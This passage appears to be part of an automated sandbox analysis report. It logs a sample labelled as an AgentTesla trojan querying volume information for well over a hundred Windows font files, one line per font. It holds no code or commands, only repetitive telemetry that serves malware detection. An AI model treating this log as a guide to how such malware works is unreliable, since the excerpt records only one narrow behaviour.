                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
